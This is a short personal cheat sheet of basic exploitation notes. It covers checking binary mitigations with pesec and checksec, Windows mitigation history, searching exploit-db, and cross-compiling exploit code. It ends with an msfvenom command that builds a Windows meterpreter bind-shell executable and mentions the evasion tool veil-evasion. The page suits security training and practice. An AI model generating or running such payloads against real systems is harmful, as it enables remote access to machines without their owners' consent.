Last changed: 20.07.2020
basic exploitation
Here I collect some notes on finding or writing simple exploits.
The websites root-me.org and io.netgarage.org offer many different callenges for practice.
exploit mitigations
To detect optional exploit mitigation features in PE binaries.
pev contains the tool pesec
pesec binary.exe
For ELF binaries you can use checksec.sh.
./checksec file=elf_binary
windows mitigation timeline
The following table shows some exploit mitigations and the Windows versions introducing it.
XP SP2 | Vista | Windows 7 | Windows 8 | Windows 10 |
---|---|---|---|---|
DEP | ASLR | EMET | GuardPages | CFG |
SafeSEH | LFH | SMEP | Exploit Guard | |
SafeUnlink | SEHOP | |||
Canaries |
You can check the Exploit Guard
status in Windows 10 with powershell
Get-ProcessMitigation -System
find publicly available exploits
online exploit ressources
www.exploit-db.com/search/
google: <search_string> exploit site:securityfocus.com inurl:bid
exploit-db (offline)
searchsploit <search_string>
grep -i <search_string> /usr/share/exploitdb/files_exploits.csv
compilation
show local libc version
$(ldd $(which ls) | grep libc.so | cut -d " " -f3) | head -n1
compile for 32bit target
apt install gcc-multilib
gcc -m32 exploit.c -o exploit
compile for windows target
/home/user/.wine/drive_c/MinGW/bin/gcc.exe exploit.c -o exploit.exe
Another way to setup the cross-compile environment is to install veil-evasion.
meterpreter binary
msfvenom -l payloads
msfvenom -p windows/x64/meterpreter/bind_tcp --list-options
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=1337 -f exe -o meterpreter.exe